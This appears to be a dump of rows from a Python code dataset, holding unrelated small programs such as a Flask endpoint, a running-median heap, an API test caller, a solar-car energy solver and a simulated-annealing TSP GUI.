content
stringlengths
0
1.05M
origin
stringclasses
2 values
type
stringclasses
2 values
from environment import environment as env


class syscalls:
    """This class holds a framework for system calls and should ultimately
    depend on an architecture template I think. For now, it's basically a
    function map to allow programming system calls like you really would.
    """

    def __init__(self):
        # BUG FIX: _map was never initialized, so getIdByName() raised
        # AttributeError instead of the intended KeyError. Start with an
        # empty name -> syscall-number map; entries are registered later.
        self._map = {}

    def call(self):
        """ Represents the 0x80 instruction. """
        # The syscall number is read from the emulated rax register.
        syscall_number = env.rax.val()
        # args = [env.ebx.val(), env.ecx.val(), env.edx.val(), env.esi.val(), env.edi.val(), env.ebp.val()]
        # handle stack args
        # Look up syscall_number in the function map,
        pass

    def getIdByName(self, name):
        """ Return a system call number based on the name of the syscall.

        Example: env.mov(rax, sys.getIdByName('foo_bar'))

        Raises KeyError("Invalid syscall name") for unknown names.
        """
        try:
            value = self._map[name]
        except KeyError:
            raise KeyError("Invalid syscall name")
        return value
nilq/baby-python
python
# Thin launcher for the astute application: delegates straight to the
# package's __main__ entry point, supplying the bundled window icon.
from astute.__main__ import main
from astute.__main__ import Icon

if __name__ == '__main__':
    # Icon path is relative to the working directory the script is run from.
    main(icon=Icon('astute/astute.ico'))
nilq/baby-python
python
# *ex2 - Program with a repetition loop that the user leaves only when they
# want to; its goal is to show the musical note and its frequency based on
# the key supplied by the user.
from os import system
from time import sleep
from cores import *


def sair():
    # Farewell message, then terminate the program.
    print(f'\t\t{cor["verde"]}Até mais!{cor["limpar"]}')
    sleep(1)
    quit()


def do():
    print('''
Nota: Dó
Frequência: 262 Hz''')
    input()


def re():
    print('''
Nota: Ré
Frequência: 294 Hz''')
    input()


def mi():
    print('''
Nota: Mi
Frequência: 330 Hz''')
    input()


def fa():
    print('''
Nota: Fá
Frequência: 349 Hz''')
    input()


def sol():
    print('''
Nota: Sol
Frequência: 392 Hz''')
    input()


def la():
    print('''
Nota: Lá
Frequência: 440 Hz''')
    input()


def si():
    print('''
Nota: Si
Frequência: 494 Hz''')
    input()


def erro():  # In case the user enters a value that is not in the dictionary
    print(f'{cor["vermelho"]}Escolha invalida. Tente novamente!{cor["limpar"]}')
    sleep(1)


while True:
    system('cls')
    tecla = str(input(f'''
{cor['verde']}> TECLA <{cor['limpar']}
---------
C D E F G A B
{cor['vermelho']}SAIR{cor['limpar']}

{cor['amarelo']}Insira a tecla:{cor['limpar']} ''')).lower().strip()
    # Dispatch table: key -> handler. 'sair' exits; anything unknown -> erro.
    operacoes = {
        'c': do,
        'd': re,
        'e': mi,
        'f': fa,
        'g': sol,
        'a': la,
        'b': si,
        'sair': sair
    }
    system('cls')
    # BUG FIX: the original wrapped this call in print(), which printed a
    # spurious "None" after every note (each handler prints its own output
    # and returns None). Just invoke the handler.
    operacoes.get(tecla, erro)()
nilq/baby-python
python
# coding: utf-8

# libraries import
import json
from flask import Flask, render_template, redirect, url_for, request, jsonify, flash
from flask_zurb_foundation import Foundation
from sqlalchemy_wrapper import SQLAlchemy

app = Flask(__name__)

# Configuration
app.config["DEBUG"] = True

from models import RandomData, db

# Initializations
foundation = Foundation(app)


# views
@app.route("/")
def index():
    """Render the index page with every stored RandomData row."""
    data = db.query(RandomData).all()
    return render_template(
        "index.html",
        data=data
    )


@app.route("/save", methods=["POST"])
def save():
    """Persist the JSON body of the request as a new RandomData row.

    Returns a JSON envelope with keys: message, status, and either the
    echoed data (success) or the error text (alert).
    """
    # grab the received data
    returned_data = {}
    received_data = request.json
    try:
        new_random_data = RandomData(received_data)
        db.session.add(new_random_data)
        db.session.commit()
        returned_data["message"] = "Se Creó una nueva data aleatoria"
        returned_data["data"] = received_data
        returned_data["status"] = "success"
    except Exception as e:
        returned_data["message"] = "Hubo un error"
        # BUG FIX: exception objects are not JSON serializable, so
        # jsonify() below would itself raise and mask the real error.
        # Store the error text instead.
        returned_data["error"] = str(e)
        returned_data["status"] = "alert"
    return jsonify(returned_data)
nilq/baby-python
python
from collections import Counter


class Solution(object):

    def match_note_to_magazine(self, ransom_note, magazine):
        """Return True if ransom_note can be assembled from magazine's characters.

        Each character in the magazine may be used at most once.

        :param ransom_note: string of required characters
        :param magazine: string of available characters
        :raises TypeError: if either argument is None
        """
        if ransom_note is None or magazine is None:
            raise TypeError('ransom_note or magazine cannot be None')
        # Idiom: Counter subtraction keeps only positive counts, so the
        # difference is empty exactly when the magazine covers every
        # required character with sufficient multiplicity. This replaces
        # the hand-rolled character-count dict of the original.
        return not (Counter(ransom_note) - Counter(magazine))
nilq/baby-python
python
# File : text.py # Author : Zhengkun Tian # Email : zhengkun.tian@outlook.com import torch import logging from otrans.data import * from torch.utils.data import Dataset class TextDataset(Dataset): def __init__(self, params, datadict, is_eval=False): self.params = params self.is_eval = is_eval self.src_unit2idx = load_vocab(params['src_vocab']) self.tgt_unit2idx = load_vocab(params['tgt_vocab']) self.reverse = params['reverse'] if 'reverse' in params else False if self.reverse: logging.info('Reverse the src and tgt sequence!') self.src_list = [] self.tgt_dict = {} for src_file in datadict['src']: with open(src_file, 'r', encoding='utf-8') as t: for line in t: parts = line.strip().split() utt_id = parts[0] label = [] for c in parts[1:]: label.append(self.src_unit2idx[c] if c in self.src_unit2idx else self.src_unit2idx[UNK_TOKEN]) self.src_list.append((utt_id, label)) for tgt_file in datadict['tgt']: with open(tgt_file, 'r', encoding='utf-8') as t: for line in t: parts = line.strip().split() utt_id = parts[0] label = [] for c in parts[1:]: label.append(self.tgt_unit2idx[c] if c in self.tgt_unit2idx else self.tgt_unit2idx[UNK_TOKEN]) self.tgt_dict[utt_id] = label assert len(self.src_list) == len(self.tgt_dict) self.lengths = len(self.src_list) def __getitem__(self, index): idx, src_seq = self.src_list[index] tgt_seq = self.tgt_dict[idx] if self.reverse: src_seq.reverse() tgt_seq.reverse() return idx, src_seq, tgt_seq def __len__(self): return self.lengths @property def src_vocab_size(self): return len(self.src_unit2idx) @property def tgt_vocab_size(self): return len(self.tgt_unit2idx) @property def src_idx2unit(self): return {i: c for (c, i) in self.src_unit2idx.items()} @property def tgt_idx2unit(self): return {i: c for (c, i) in self.tgt_unit2idx.items()}
nilq/baby-python
python
"""Custom test and setup properties for checkin pull_info provider."""

load("//container:providers.bzl", "PullInfo")

def _pull_info_validation_test_impl(ctx):
    """Test rule impl: emits a bash script comparing a target's PullInfo
    fields (registry, repository, digest) against expected attr values.

    The generated script exits 1 with a diagnostic on the first mismatch
    and prints PASSED otherwise.
    """
    pull_info = ctx.attr.target[PullInfo]
    compare_script_file = ctx.actions.declare_file("compare.sh")

    # First segment defines the bash helper; second segment (with .format)
    # bakes the expected/actual values into the script at analysis time.
    compare_script = """#!/usr/bin/env bash
function assert_equals(){
    if [ "$2" != "$3" ]; then
        echo "Expected $1 to be '$2' but was '$3'"
        exit 1
    fi
}
""" + """
assert_equals "base_image_registry" "{expected_registry}" "{actual_registry}"
assert_equals "base_image_repository" "{expected_repository}" "{actual_repository}"
assert_equals "base_image_digest" "{expected_digest}" "{actual_digest}"
echo "PASSED"
""".format(
        expected_registry = ctx.attr.expected_registry,
        actual_registry = pull_info.base_image_registry,
        expected_repository = ctx.attr.expected_repository,
        actual_repository = pull_info.base_image_repository,
        expected_digest = ctx.attr.expected_digest,
        actual_digest = pull_info.base_image_digest,
    )
    ctx.actions.write(compare_script_file, compare_script, is_executable = True)
    # The script must be in runfiles so the test runner can execute it.
    return [DefaultInfo(executable = compare_script_file, runfiles = ctx.runfiles(files = [compare_script_file]))]

pull_info_validation_test = rule(
    implementation = _pull_info_validation_test_impl,
    attrs = {
        "expected_digest": attr.string(mandatory = True),
        "expected_registry": attr.string(mandatory = True),
        "expected_repository": attr.string(mandatory = True),
        # The target under test must advertise PullInfo.
        "target": attr.label(providers = [PullInfo]),
    },
    test = True,
)
nilq/baby-python
python
# Converting the main code to use datetime objects as well instead of just time objects # Took out defaults from the iter functions import time, math from datetime import datetime from models.energy import defaultModel, load_data, GPSCoordinate#, powerConsumption from models.Predictor import powerGeneration # function 1: Given velocity, find energy # Default start: Now, end: 5 PM (17:00) # energy change=energy generated-energy consumed def calc_dE(velocity, latitude, longitude, altitude, start_time=time.strftime("%Y %m %d %H:%M", time.localtime()), end_time="17:00", cloudy=0): # Must convert end_time into a proper string # Format: Year Month Day Hour:Min if end_time == "17:00": end_time = time.strftime("%Y %m %d", time.localtime()) + " 17:00" it = iter_dE(velocity, latitude, longitude, start_time, end_time, cloudy) for (done, dE) in it: if done: return dE def iter_dE(velocity, latitude, longitude, start_time, end_time, cloudy): # Time Objects for Kevin's Program # Arguments should be in this format: "Year Month Day Hour:Min" # "2011 10 11 14:00" st = time.strptime(start_time, "%Y %m %d %H:%M") et = time.strptime(end_time, "%Y %m %d %H:%M") # Datetime Objects for Wesley's Program # Arguments should be in this format: "Year Month Day Hour:Min" # "2011 10 11 14:00" dST = datetime.strptime(start_time, "%Y %m %d %H:%M") dET = datetime.strptime(end_time, "%Y %m %d %H:%M") it = defaultModel.energy_loss_iterator(velocity, latitude, longitude, time.mktime(et)-time.mktime(st)) for (done, losses) in it: yield (False, -losses) if done: break yield (True, powerGeneration(latitude, velocity, dST, dET, cloudy) - losses) def calc_V(energy, latitude, longitude, altitude, start_time = time.strftime("%Y %m %d %H:%M", time.localtime()), end_time="17:00", cloudy=0): # Must convert end_time into a proper string # Format: Year Month Day Hour:Min if end_time == "17:00": end_time = time.strftime("%Y %m %d", time.localtime()) + " 17:00" it = iter_V(energy, latitude, longitude, altitude, 
start_time, end_time, cloudy) for (done, velocity) in it: if done: return velocity # function 2: Given energy, find velocity def iter_V(energy, latitude, longitude, altitude, start_time, end_time, cloudy): # Start with an arbitrary average velocity... say...50 km/h velocity_guess = 50.0 # error_bound error = 0.01 # limit the number of iterations in case newton's method diverges iteration_limit = 200 current_iteration = 0 dv = 0.01 # Time Objects st = time.strptime(start_time, "%Y %m %d %H:%M") et = time.strptime(end_time, "%Y %m %d %H:%M") dt = time.mktime(et) - time.mktime(st) # Datetime Objects dST = datetime.strptime(start_time, "%Y %m %d %H:%M") dET = datetime.strptime(end_time, "%Y %m %d %H:%M") start = GPSCoordinate(latitude, longitude, altitude) # We try to find a velocity such that the energy generated - the energy # consumed = the specified energy change. In order to do this, we start # with a guess for the correct velocity and use Newton's method to get # closer and closer to the correct velocity. Newton's method is a method # to approximate the root of a function f(x) by starting with a guess of # the root and repeatedly updating the guess by finding the tangent to f(x) # at the guess and then finding the intersection of that tangent and the x # axis. This x-value of this intersection point is the new guess. 
while current_iteration < iteration_limit: energy_gen = powerGeneration(latitude, velocity_guess, dST, dET, cloudy) energy_loss = powerConsumption(start, velocity_guess, dt) energy_change = energy_gen - energy_loss if math.fabs(energy_change - energy) < error: yield (True, velocity_guess) print 'answer=',velocity_guess break else: # Update velocity guess value energy_gen = powerGeneration(latitude, velocity_guess+dv, dST, dET, cloudy) energy_loss = powerConsumption(start, velocity_guess+dv, dt) print 'powerGeneration: ', energy_gen print 'powerConsumption: ', energy_loss E_prime = ((energy_gen - energy_loss) - energy_change) / dv velocity_guess = velocity_guess - (energy_change - energy) / E_prime current_iteration += 1 yield (False, velocity_guess) if not(math.fabs(energy_change - energy) < error): # Sometime's Newton's method diverges, so we use a more reliable naive # method if Newton's fails to converge after the set amount of iterations. # Reset velocity_guess velocity_guess = 50.0 # Reset current_iteration current_iteration = 0 # Change limit iteration_limit = 1000 # Start with some increment amount increment_amount = 25.0 # Hold onto our previous guesses just in case... prev_guess = 0 # We assume that energy generated - energy consumed generally decreases # when velocity increases. So when the calculated energy change - the # desired change in energy at the guess velocity is positive, we increase # the guess velocity to get closer to the correct velocity. On the other # hand, if the calculated energy change - the desired change in energy at # the guess velocity is negative, we decrease the guess velocity to get # closer to the correct velocity. Everytime we change the direction in # which we increment the guess velocity, we know we have overshot the # correct velocity, so we half the increment amount to zero in on the # correct velocity. 
while current_iteration < iteration_limit: energy_gen = powerGeneration(latitude, velocity_guess, dST, dET, cloudy) energy_loss = powerConsumption(start, velocity_guess, dt) energy_change = energy_gen - energy_loss if math.fabs(energy_change-energy) < error: if velocity_guess < 0: print "Input energy too high -> velocity ended up negative." yield (True, velocity_guess) print 'answer=',velocity_guess break elif energy_change-energy > 0: #check to see if we overshot: if velocity_guess+increment_amount == prev_guess: increment_amount = increment_amount/2 prev_guess = velocity_guess velocity_guess += increment_amount else: #check to see if we overshot: if velocity_guess-increment_amount == prev_guess: increment_amount = increment_amount/2 prev_guess = velocity_guess velocity_guess -= increment_amount current_iteration += 1 yield (False, velocity_guess) if not(math.fabs(energy_change - energy) < error): # DOOM print "Max iterations exceeded. Try different inputs." yield (True, -1) # Dummy test functions ##def powerGeneration(latitude, velocity, start_time, end_time, cloudy): ## energy_change = (1-cloudy)*(time.mktime(end_time)-time.mktime(start_time)) ## return energy_change def powerConsumption((latitude, longitude, altitude), velocity, time): energy_eaten = 0.3*time*velocity return energy_eaten # Main Caller and Loop Function if __name__ == '__main__': # Previous calculation state: calcType = 0 energyState = 0 inputVelocity = 0 inputEnergy = 0 endTime = "0:00" #initialize route database: load_data() # User input loop while True: # Asks user whether to start a new calculation or modify the previous one operationType = raw_input("Enter 'n' to start a new calculation. Enter 'm' to modify a previous calculation. ") if operationType=="n": # Starting new calculation calcType=raw_input("Enter 'v' to calculate the average velocity given a change in battery energy. Enter 'e' to calculate change in battery energy given an average velocity. 
") # Calculate velocity given a change in energy if calcType=="v": inputEnergy=raw_input("Please enter the desired energy change: ") longitude=raw_input("Please enter your current longitude coordinate: ") lat=raw_input("Please enter your current latitude coordinate: ") alt=raw_input("Please enter your current altitude: ") startTime=raw_input("Please enter your desired start time. Format: 'year month day hr:min' (24 hr time) If you leave this field blank, 'now' will be the start time. ") if startTime=="": print ("Start time defaulted to now") startTime=time.strftime("%Y %m %d %H:%M",time.localtime()) endTime=raw_input("Please enter your desired end time. Format: 'year month day hr:min' (24 hr time) If you leave this field blank, 17:00 will be the start time. ") if endTime=="": print ("End time defaulted to today at 17:00") # Default endTime will be handled along the way endTime="17:00" energyState=raw_input("Please enter the energy level (in MJ) of the batteries at the start location: ") cloudiness=raw_input("Please enter a projected %cloudy value [0,1]. If you leave this field blank, historical values will be used. ") if cloudiness=="": cloudiness=-1 print str(calc_V(float(inputEnergy),float(longitude),float(lat),float(alt),startTime,endTime,float(cloudiness))) + "km/h" # Calculate change in energy given a velocity if calcType=="e": inputVelocity=raw_input("Please enter the desired average velocity: ") longitude=raw_input("Please enter your current longitude coordinate: ") lat=raw_input("Please enter your current latitude coordinate: ") alt=raw_input("Please enter your current altitude: ") startTime=raw_input("Please enter your desired start time. Format: 'year month day hr:min' (24 hr time) If you leave this field blank, 'now' will be the start time. ") if startTime=="": print ("Start time defaulted to now") startTime=time.strftime("%Y %m %d %H:%M",time.localtime()) endTime=raw_input("Please enter your desired end time. 
Format: 'hr:min' (24 hr time) If you leave this field blank, 17:00 will be the start time. ") if endTime=="": print ("End time defaulted to today at 17:00") # This'll be handled later endTime="17:00" energyState=raw_input("Please enter the energy level (in MJ) of the batteries at the start location: ") cloudiness=raw_input("Please enter a projected %cloudy value [0,1]. If you leave this field blank, historical values will be used. ") if cloudiness=="": cloudiness=-1 print str(calc_dE(float(inputVelocity),float(longitude),float(lat), float(alt), startTime,endTime,float(cloudiness))) + "MJ" elif operationType == "m" and type!=0: # Modifying previous calculation ce = raw_input("Please enter the current energy of the car: ") currentEnergy = float(ce) newEnergy = float(inputEnergy) - (currentEnergy - float(energyState)) clouds = raw_input("Please enter a new %cloudy value [0,1]: ") cloudiness = float(clouds) newLongitude = raw_input("Please enter a new longitude value: ") longitude = float(newLongitude) newLat = raw_input("Please enter a new latitude value: ") lat = float(newLat) startTime = time.strftime("%Y %m %d %H:%M", time.localtime()) if type == "v": # Calculate velocity given a change in energy print str(calc_V(newEnergy, longitude, lat, startTime, endTime, cloudiness))+ "km/h" else: # Calculate change in energy given a velocity print str(calc_dE(float(inputVelocity), longitude, lat, startTime, endTime, cloudiness) + (currentEnergy - float(energyState))+"MJ")
nilq/baby-python
python
#!/usr/bin/env python3
# ccc 2021 senior 10/15
# Toggle whole rows/columns of a boolean canvas and track how many cells
# are currently painted ("gold").
from sys import stdin

num_rows = int(stdin.readline())
num_cols = int(stdin.readline())
num_ops = int(stdin.readline())

# painted[r][c] is True when cell (r, c) is currently painted.
painted = [[False] * num_cols for _ in range(num_rows)]

gold = 0
for _ in range(num_ops):
    parts = stdin.readline().split()
    op = parts[0]
    idx = int(parts[1]) - 1  # queries are 1-indexed
    if op == 'R':
        # Flip every cell of the row; painting adds gold, unpainting removes it.
        row = painted[idx]
        for c in range(num_cols):
            gold += -1 if row[c] else 1
            row[c] = not row[c]
    elif op == 'C':
        # Same, flipping a column.
        for r in range(num_rows):
            gold += -1 if painted[r][idx] else 1
            painted[r][idx] = not painted[r][idx]

print(gold)
nilq/baby-python
python
import requests
import json

from . import filler, models

# Allowed HTTP methods and, for each, the request keys that must be present.
VALID_HTTP_METHODS = {
    'GET': ['url'],
    'PATCH': ['url', 'data'],
    'PUT': ['url', 'data'],
    'POST': ['url', 'data'],
    'DELETE': ['url'],
}


def call(step, responses, config: models.SuiteConfig):
    """
    Main API Caller

    Validates the step's request, substitutes {{baseUrl}} and any
    filler-regex placeholders (resolved against prior responses),
    performs the HTTP request, and returns the structured response dict
    built by build_response.

    :param step: test-step dict; must contain a 'request' sub-dict
    :param responses: list of prior response dicts used for placeholder filling
    :param config: suite configuration supplying base_url
    :return: response dict (see build_response)
    """
    req = step.get('request')
    validate_request(req)
    method = req.get('method', None)
    url = filler.fill_regex(req['url'].replace('{{baseUrl}}', config.base_url), responses)
    payload = req.get('data', None)
    if payload is not None:
        # Placeholders are filled on the raw string before JSON parsing.
        payload_clean = filler.fill_regex(payload, responses)
        payload = json.loads(payload_clean)
    headers = None
    print('Calling {method} @ {url}'.format(method=method, url=url))
    response_raw = requests.request(method=method, url=url, json=payload, headers=headers)
    response_json = {}
    try:
        response_json = response_raw.json()
    except ValueError:
        print('Invalid json')
        # no JSON: nothing to do
    print('Response ({number}) {status}: {response}'.format(number=len(responses),
                                                            status=response_raw.status_code,
                                                            response=json.dumps(response_json)))
    response = build_response(step, response_raw, payload)
    return response


def mock(step, responses):
    """Build a mock response from the step's inline 'response' template,
    after placeholder filling against prior responses."""
    response = step.get('response')
    response_filled = filler.fill_regex(response, responses)
    response_json = json.loads(response_filled)
    return build_response_mock(step, response_json)


def build_response(step, response_raw, payload):
    """Convert a requests.Response into the suite's response dict.

    The 'json' key is None when the body is not parseable JSON.
    """
    response = {
        "type": "HTTP",
        "name": step.get("name", "Unnamed Request"),
        "description": step.get("name", "Undescribed Request"),
        "headers": dict(response_raw.headers),
        "body": response_raw.text,
        "status": response_raw.status_code,
        "request": {
            "body": payload,
            "headers": dict(response_raw.request.headers),
            "method": response_raw.request.method,
            "url": response_raw.request.url
        }
    }
    try:
        response["json"] = response_raw.json()
    except json.JSONDecodeError:
        print('Unable to parse json response')
        response["json"] = None
    return response


def build_response_mock(step, response_json):
    """Wrap an already-parsed mock body in the suite's response dict shape."""
    return {
        "type": "MOCK",
        "name": step.get("name", "Unnamed Request"),
        "description": step.get("name", "Undescribed Request"),
        "json": response_json
    }


# simple validation
def validate_request(req):
    """Raise if the request dict is missing a method, uses an unsupported
    method, or lacks any key that method requires; return True otherwise."""
    name = req.get('name', 'UNNAMED REQUEST')
    method = req.get('method', None)
    if method is None:
        raise Exception('MISSING METHOD')
    if method not in VALID_HTTP_METHODS.keys():
        raise Exception('INVALID METHOD {method}'.format(method=method))
    configs = VALID_HTTP_METHODS.get(method)
    for config in configs:
        if req.get(config, None) is None:
            raise Exception('MISSING {config} FROM {name}'.format(config=config, name=name))
    return True
nilq/baby-python
python
'''
Created on 1.12.2016

@author: Darren

Running-median data structure.

The median is the middle value of an ordered integer list; for an
even-sized list it is the mean of the two middle values.

Supports:
    addNum(num)  - add an integer from the data stream
    findMedian() - return the median of all elements so far

Example: add(1); add(2); findMedian() -> 1.5; add(3); findMedian() -> 2
'''
from heapq import *


class MedianFinder:

    def __init__(self):
        # Two-heap invariant:
        #   heaps[0] ("lower") is a max-heap (stored negated) of the smaller half,
        #   heaps[1] ("upper") is a min-heap of the larger half,
        #   and len(upper) is always len(lower) or len(lower) + 1.
        self.heaps = [], []

    def addNum(self, num):
        # Push through the upper heap so its minimum moves down, then
        # rebalance if the lower half grew too large.
        lower, upper = self.heaps
        heappush(lower, -heappushpop(upper, num))
        if len(upper) < len(lower):
            heappush(upper, -heappop(lower))

    def findMedian(self):
        lower, upper = self.heaps
        if len(upper) > len(lower):
            # Odd count: the extra element sits atop the upper heap.
            return float(upper[0])
        # Even count: average the two middle elements (lower's top is negated).
        return (upper[0] - lower[0]) / 2.0


nums = [1, 2, 3, 4, 5, 6]
mf = MedianFinder()
for num in nums:
    mf.addNum(num)
print(mf.findMedian())
nilq/baby-python
python
from tkinter import *
import sys
import os.path
# Make the parent directory importable so the shared `search` module
# (Problem, Node, romania_map, probability, random, math via star import)
# can be found.
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from search import *
import numpy as np

# Global city-to-city distance table: distances['A']['B'] is the euclidean
# distance between the coordinates of A and B (filled in by main()).
distances = {}


class TSP_problem(Problem):

    """ subclass of Problem to define various functions """

    def two_opt(self, state):
        """ Neighbour generating function for Traveling Salesman Problem """
        # Reverse a random sub-segment of the tour (classic 2-opt move).
        neighbour_state = state[:]
        left = random.randint(0, len(neighbour_state) - 1)
        right = random.randint(0, len(neighbour_state) - 1)
        if left > right:
            left, right = right, left
        neighbour_state[left: right + 1] = reversed(neighbour_state[left: right + 1])
        return neighbour_state

    def actions(self, state):
        """ action that can be executed in given state """
        return [self.two_opt]

    def result(self, state, action):
        """ result after applying the given action on the given state """
        return action(state)

    def path_cost(self, c, state1, action, state2):
        """ total distance for the Traveling Salesman to be covered if in state2 """
        # Sum of consecutive leg distances plus the closing leg back to start.
        cost = 0
        for i in range(len(state2) - 1):
            cost += distances[state2[i]][state2[i + 1]]
        cost += distances[state2[0]][state2[-1]]
        return cost

    def value(self, state):
        """ value of path cost given negative for the given state """
        # Negated so that hill-climbing/annealing maximization minimizes distance.
        return -1 * self.path_cost(None, None, None, state)


class TSP_Gui():
    """ Class to create gui of Traveling Salesman using simulated annealing where one can
    select cities, change speed and temperature. Distances between cities are euclidean
    distances between them.
    """

    def __init__(self, root, all_cities):
        self.root = root
        self.vars = []              # IntVars backing the city checkboxes
        self.frame_locations = {}   # city name -> (x, y) canvas coordinates
        self.calculate_canvas_size()
        self.button_text = StringVar()
        self.button_text.set("Start")
        self.all_cities = all_cities
        self.frame_select_cities = Frame(self.root)
        self.frame_select_cities.grid(row=1)
        self.frame_canvas = Frame(self.root)
        self.frame_canvas.grid(row=2)
        Label(self.root, text="Map of Romania", font="Times 13 bold").grid(row=0, columnspan=10)

    def create_checkboxes(self, side=LEFT, anchor=W):
        """ To select cities which are to be a part of Traveling Salesman Problem """
        # Checkboxes are laid out in rows of 10; all start selected.
        row_number = 0
        column_number = 0
        for city in self.all_cities:
            var = IntVar()
            var.set(1)
            Checkbutton(self.frame_select_cities, text=city, variable=var).grid(
                row=row_number, column=column_number, sticky=W)
            self.vars.append(var)
            column_number += 1
            if column_number == 10:
                column_number = 0
                row_number += 1

    def create_buttons(self):
        """ Create start and quit button """
        Button(self.frame_select_cities, textvariable=self.button_text,
               command=self.run_traveling_salesman).grid(row=3, column=4, sticky=E + W)
        Button(self.frame_select_cities, text='Quit', command=self.root.destroy).grid(
            row=3, column=5, sticky=E + W)

    def run_traveling_salesman(self):
        """ Choose selected cities """
        # Build the problem from the checked cities only, then draw/solve.
        cities = []
        for i in range(len(self.vars)):
            if self.vars[i].get() == 1:
                cities.append(self.all_cities[i])
        tsp_problem = TSP_problem(cities)
        self.button_text.set("Reset")
        self.create_canvas(tsp_problem)

    def calculate_canvas_size(self):
        """ Width and height for canvas """
        # Bounding box of all city coordinates on the Romania map.
        minx, maxx = sys.maxsize, -1 * sys.maxsize
        miny, maxy = sys.maxsize, -1 * sys.maxsize
        for value in romania_map.locations.values():
            minx = min(minx, value[0])
            maxx = max(maxx, value[0])
            miny = min(miny, value[1])
            maxy = max(maxy, value[1])
        # New locations squeezed to fit inside the map of romania
        for name, coordinates in romania_map.locations.items():
            self.frame_locations[name] = (coordinates[0] / 1.2 - minx + 150,
                                          coordinates[1] / 1.2 - miny + 165)
        canvas_width = maxx - minx + 200
        canvas_height = maxy - miny + 200
        self.canvas_width = canvas_width
        self.canvas_height = canvas_height

    def create_canvas(self, problem):
        """ creating map with cities """
        map_canvas = Canvas(self.frame_canvas, width=self.canvas_width,
                            height=self.canvas_height)
        map_canvas.grid(row=3, columnspan=10)
        current = Node(problem.initial)
        map_canvas.delete("all")
        # Background image must be kept as an attribute or Tk garbage-collects it.
        self.romania_image = PhotoImage(file="../images/romania_map.png")
        map_canvas.create_image(self.canvas_width / 2, self.canvas_height / 2,
                                image=self.romania_image)
        cities = current.state
        for city in cities:
            x = self.frame_locations[city][0]
            y = self.frame_locations[city][1]
            map_canvas.create_oval(x - 3, y - 3, x + 3, y + 3,
                                   fill="red", outline="red")
            map_canvas.create_text(x - 15, y - 10, text=city)
        self.cost = StringVar()
        Label(self.frame_canvas, textvariable=self.cost, relief="sunken").grid(
            row=2, columnspan=10)
        # User-tunable animation speed and annealing temperature.
        self.speed = IntVar()
        speed_scale = Scale(self.frame_canvas, from_=500, to=1, orient=HORIZONTAL,
                            variable=self.speed, label="Speed ----> ",
                            showvalue=0, font="Times 11", relief="sunken",
                            cursor="gumby")
        speed_scale.grid(row=1, columnspan=5, sticky=N + S + E + W)
        self.temperature = IntVar()
        temperature_scale = Scale(self.frame_canvas, from_=100, to=0, orient=HORIZONTAL,
                                  length=200, variable=self.temperature,
                                  label="Temperature ---->", font="Times 11",
                                  relief="sunken", showvalue=0, cursor="gumby")
        temperature_scale.grid(row=1, column=5, columnspan=5, sticky=N + S + E + W)
        self.simulated_annealing_with_tunable_T(problem, map_canvas)

    # NOTE: plain function (no self) defined in class scope so it can be
    # evaluated as the default for the `schedule` parameter below.
    def exp_schedule(k=100, lam=0.03, limit=1000):
        """ One possible schedule function for simulated annealing """
        return lambda t: (k * math.exp(-lam * t) if t < limit else 0)

    def simulated_annealing_with_tunable_T(self, problem, map_canvas, schedule=exp_schedule()):
        """ Simulated annealing where temperature is taken as user input """
        current = Node(problem.initial)
        while(1):
            # Temperature comes from the GUI slider each iteration.
            T = schedule(self.temperature.get())
            if T == 0:
                return current.state
            neighbors = current.expand(problem)
            if not neighbors:
                return current.state
            next = random.choice(neighbors)
            delta_e = problem.value(next.state) - problem.value(current.state)
            # Accept improvements always; accept worse moves with
            # probability exp(delta_e / T), then redraw the tour.
            if delta_e > 0 or probability(math.exp(delta_e / T)):
                map_canvas.delete("poly")
                current = next
                self.cost.set("Cost = " + str('%0.3f' % (-1 * problem.value(current.state))))
                points = []
                for city in current.state:
                    points.append(self.frame_locations[city][0])
                    points.append(self.frame_locations[city][1])
                map_canvas.create_polygon(points, outline='red', width=3,
                                          fill='', tag="poly")
                map_canvas.update()
            map_canvas.after(self.speed.get())


def main():
    # Build the global euclidean distance table for every city pair, then
    # start the Tk main loop with the selection panel.
    all_cities = []
    for city in romania_map.locations.keys():
        distances[city] = {}
        all_cities.append(city)
    all_cities.sort()

    # distances['city1']['city2'] contains euclidean distance between their coordinates
    for name_1, coordinates_1 in romania_map.locations.items():
        for name_2, coordinates_2 in romania_map.locations.items():
            distances[name_1][name_2] = np.linalg.norm(
                [coordinates_1[0] - coordinates_2[0],
                 coordinates_1[1] - coordinates_2[1]])
            distances[name_2][name_1] = np.linalg.norm(
                [coordinates_1[0] - coordinates_2[0],
                 coordinates_1[1] - coordinates_2[1]])

    root = Tk()
    root.title("Traveling Salesman Problem")
    cities_selection_panel = TSP_Gui(root, all_cities)
    cities_selection_panel.create_checkboxes()
    cities_selection_panel.create_buttons()
    root.mainloop()


if __name__ == '__main__':
    main()
nilq/baby-python
python
# Animated plot of an averaged evoked-potential (PEATC) curve with
# progressively decreasing synthetic gaussian noise added on each frame.
import matplotlib.pyplot as plt
from matplotlib.patches import Ellipse
import matplotlib.animation as animation
from matplotlib.text import OffsetFrom
import numpy as np
import csv

# Load the base curve from CSV; column 0 -> a (x axis), column 1 -> b
# (y axis), both scaled down by 10.
a = []
b = []
with open('curvatest.csv', 'r') as csvfile:
    plots = csv.reader(csvfile, delimiter=',')
    for row in plots:
        a.append(float(row[0]) / 10)
        b.append(float(row[1]) / 10)
print(a)

t = np.linspace(1, 12, 26)
out_a = np.asarray(b)   # signal amplitudes
out_b = np.asarray(a)   # time axis
x_watts = out_a ** 2
target_noise_db = 30    # starting noise level; decreased 1 dB per frame
prom = 0
text = r"80 OI "
c_red = [1.0, 0.5, 0.5]
c_blue = [0.5, 0.5, 1.0]
color = c_blue

fig, ax = plt.subplots(figsize=(3, 3))
el = Ellipse((2, -1), 0.5, 0.5)
ax.add_patch(el)

# Redraw the curve 10 times, each frame with slightly less noise,
# simulating the averaging process of repeated measurements.
for i in range(10):
    plt.title('PEATC')
    plt.ylabel('Amplitud (uV)')
    plt.xlabel('Tiempo (ms)')
    #plt.yticks([1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17])
    #plt.axis([0,12,0,18])
    ax.grid(True)
    target_noise_db = target_noise_db - 1
    # Convert dB to linear power for the gaussian noise std-dev.
    target_noise_watts = 10 ** (target_noise_db / 10)
    mean_noise = 0
    noise_volts = np.random.normal(mean_noise, np.sqrt(target_noise_watts), len(x_watts))
    y_volts = out_a + noise_volts
    # Anchor the annotation bubble at the first sample of the curve.
    ytext = y_volts[0]
    xtext = out_b[0]
